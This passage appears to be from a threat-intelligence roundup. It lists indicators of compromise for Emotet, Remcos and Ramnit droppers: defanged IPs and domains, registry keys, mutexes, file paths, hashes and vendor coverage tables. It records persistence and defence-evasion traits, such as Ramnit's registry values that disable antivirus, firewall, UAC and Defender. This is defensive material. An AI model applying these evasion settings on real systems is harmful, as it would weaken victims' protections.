IP Address contacted by malware (does not indicate maliciousness) | Occurrences
107[.]22[.]125[.]105 | 7
3[.]217[.]206[.]46 | 4

Domain Name contacted by malware (does not indicate maliciousness) | Occurrences
ninite[.]com | 21
www[.]bing[.]com | 1

File or directory created | Occurrences
%CommonProgramFiles%\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE | 23
%CommonProgramFiles(x86)%\microsoft shared\Source Engine\OSE.EXE | 23
%ProgramFiles(x86)%\Microsoft Office\Office14\GROOVE.EXE | 23
%ProgramFiles(x86)%\Mozilla Maintenance Service\maintenanceservice.exe | 23
%SystemRoot%\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe | 23
%SystemRoot%\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | 23
%SystemRoot%\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe | 23
%SystemRoot%\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | 23
%System32%\FXSSVC.exe | 23
%System32%\alg.exe | 23
%System32%\dllhost.exe | 23
%SystemRoot%\ehome\ehsched.exe | 23
%SystemRoot%\Microsoft.NET\Framework\v2.0.50727\ngen_service.log | 23
%SystemRoot%\Microsoft.NET\Framework64\v2.0.50727\ngen_service.log | 23
%SystemRoot%\SysWOW64\dllhost.exe | 23
%SystemRoot%\SysWOW64\svchost.exe | 23
%SystemRoot%\Microsoft.NET\Framework\v4.0.30319\ngen_service.log | 23
%SystemRoot%\SysWOW64\dllhost.vir | 23
%SystemRoot%\SysWOW64\svchost.vir | 23
%SystemRoot%\Microsoft.NET\Framework\v4.0.30319\ngenservicelock.dat | 23
%SystemRoot%\Microsoft.NET\Framework\v2.0.50727\ngen_service.lock | 23
%SystemRoot%\Microsoft.NET\Framework\v2.0.50727\ngenservicelock.dat | 23
%SystemRoot%\Microsoft.NET\Framework64\v2.0.50727\ngen_service.lock | 23
%SystemRoot%\Microsoft.NET\Framework64\v2.0.50727\ngenservicelock.dat | 23
%CommonProgramFiles(x86)%\microsoft shared\source engine\ose.vir | 23
*See JSON for more IOCs

File Hashes

137ad3b55addd7191c8c974beef6b65bae791bc4de1e86b7e2965b311d40e2d0 1cfd0fd601a0f5234ce72672ec9c6c866dca03836198d93a320ed5df0bddd7f8 1e831b6d0cabaa8b44de36c1b96dd6e54e295502eb171be4f87723212fe574ca 1f935627d9866da115f1aad78be290f60a639bec1a94d6b8397326eeb46c111b 30ffb87628211e78074a3a891b8bd173db6f2d74dc97e735ff386361cf29aee1 3f948d4350c566416101441adb1c00121bd835db40cc08c73a556b764458673d 47934d4f40e9a5af0ee572a7e1e088d29d3bfd655d4aff26018a64118ad68a24 563c16cb752614726d350000fbf514a8b8d32a8074cd12c7545d6ff93f790ed9 591ae4985fd6993f580eae6f93f3e96f7c73c14dc3927e96223e8003f9ab3588 5cbd454095120231e23ca372fee8e9e76f34e3f5491f8ab10e8e5203e4c52570 6f0f5fda67646bc8def9c66497041528cd8ed7158a169c1b0787f59360c28ea8 7ec4a0246b5d33dfe811f4f34ab94a6b82d822196776afbe28a0f543ade8ad63 97d0aeeca4859c38984086ff1bef13c9bd11466131058fabda20dd1b21342f7a a2839faa3c7ecbff8afa71ca5787690e0e3eaeb36b899bab1926b19ce32b8c6d bcf2ae9a67fe974c02e95fbdd4edcce7df377a288c7586dae9d0b625aeedc93b c51d235b290424ad6baf08d67ab600a260200846a3f4b218e916933594b40537 d3d7dd910bd5e79fdb39d51aa83afaccdfd10538d30dd69bc7219a146e897361 d445c1ac4afae6cb028a2508c655271e3d69e07d9e016887d89d790c80fc0409 e23566aabaa7743da973840338829cc25d6936e8fcb5fb8d9b78b0ccac46c1ea e37b0661d4e4483048abcf0abba65060c78716672790e12bb0a768f04b18134b e48a371f7f5f3ad1cda0d16312f30846b6a12494967c8fba8de7f65a5673b1ff eb1ecc1ef099105b4882ccace3caf843ed1508b1463f8af6cc94adaa0181b721 ec1bc44db50911234444c575d91335113232ab5b1f6cad6acf5e52ff16ccd8fb

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint

Secure Malware Analytics

MITRE ATT&CK

Win.Dropper.Emotet-9961142-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 218 samples
Registry Keys Occurrences
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: LanguageList
190
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Type
64
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Start
64
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ErrorControl
64
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: DisplayName
64
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: WOW64
64
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ObjectName
64
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> 63
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ImagePath
61
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Description
60
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%systemroot%\system32\dot3svc.dll,-1103
14
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @oleres.dll,-5013
10
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%systemroot%\system32\browser.dll,-101
9
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\AxInstSV.dll,-104
9
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%systemroot%\system32\dps.dll,-501
9
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\ehome\ehrecvr.exe,-102
8
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @appmgmts.dll,-3251
8
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\dhcpcore.dll,-101
8
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%systemroot%\system32\appinfo.dll,-101
8
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\System32\audiosrv.dll,-205
7
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%systemroot%\system32\appidsvc.dll,-101
7
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @comres.dll,-948
7
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\System32\dnsapi.dll,-102
7
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%systemroot%\system32\cscsvc.dll,-201
7
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\System32\bthserv.dll,-102
7
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
apps[.]identrust[.]com 82
Files and or directories created Occurrences
*See JSON for more IOCs

File Hashes

*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA This has coverage

Screenshots of Detection

Secure Endpoint

Secure Malware Analytics

MITRE ATT&CK

Win.Dropper.Remcos-9961392-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 14 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\POULUS 14
<HKCU>\SOFTWARE\POULUS\MICROMINIATURISER 14
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\BRUGERNAVNETS 14
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\BRUGERNAVNETS\TIVOLIET 14
<HKCU>\SOFTWARE\POULUS\MICROMINIATURISER
Value Name: Komplettes
14
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\BRUGERNAVNETS\TIVOLIET
Value Name: Fins
14
<HKCU>\SOFTWARE\[email protected] 7
<HKCU>\SOFTWARE\[email protected]
Value Name: licence
7
<HKCU>\SOFTWARE\[email protected]
Value Name: exepath
7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: ornamenterne
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: Hyldetrs
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: lnglidninger
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: Vampirebat
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: Dereferencing
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: Sarkastisk
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: Martyrologistic
1
Mutexes Occurrences
Remcos_Mutex_Inj 7
[email protected] 7
Global\916138a1-15e4-11ed-9660-00151792685a 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
5[.]2[.]75[.]164 7
181[.]235[.]13[.]200 4
186[.]169[.]54[.]97 3
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
colpatvalidacionnuevo[.]xyz 7
Files and or directories created Occurrences
*See JSON for more IOCs

File Hashes


Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

Secure Endpoint

Secure Malware Analytics

MITRE ATT&CK

Win.Dropper.Ramnit-9961396-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 26 samples
Registry Keys Occurrences
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: AntiVirusOverride
26
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: AntiVirusDisableNotify
26
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: FirewallDisableNotify
26
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: FirewallOverride
26
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: UpdatesDisableNotify
26
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: UacDisableNotify
26
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: EnableLUA
26
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: EnableFirewall
26
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: DoNotAllowExceptions
26
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: DisableNotifications
26
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: Start
26
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
Value Name: Start
26
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC
Value Name: Start
26
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION
Value Name: jfghdug_ooetvtgk
26
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: JudCsgdy
26
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WUAUSERV
Value Name: Start
26
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Windows Defender
26
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: Userinit
26
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: Userinit
26
Mutexes Occurrences
qazwsxedc 26
{7930D12C-1D38-EB63-89CF-4C8161B79ED4} 26
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
Files and or directories created Occurrences
%LOCALAPPDATA%\bolpidti 26
%LOCALAPPDATA%\bolpidti\judcsgdy.exe 26
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\judcsgdy.exe 26

File Hashes

*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

Secure Endpoint

Secure Malware Analytics

MITRE ATT&CK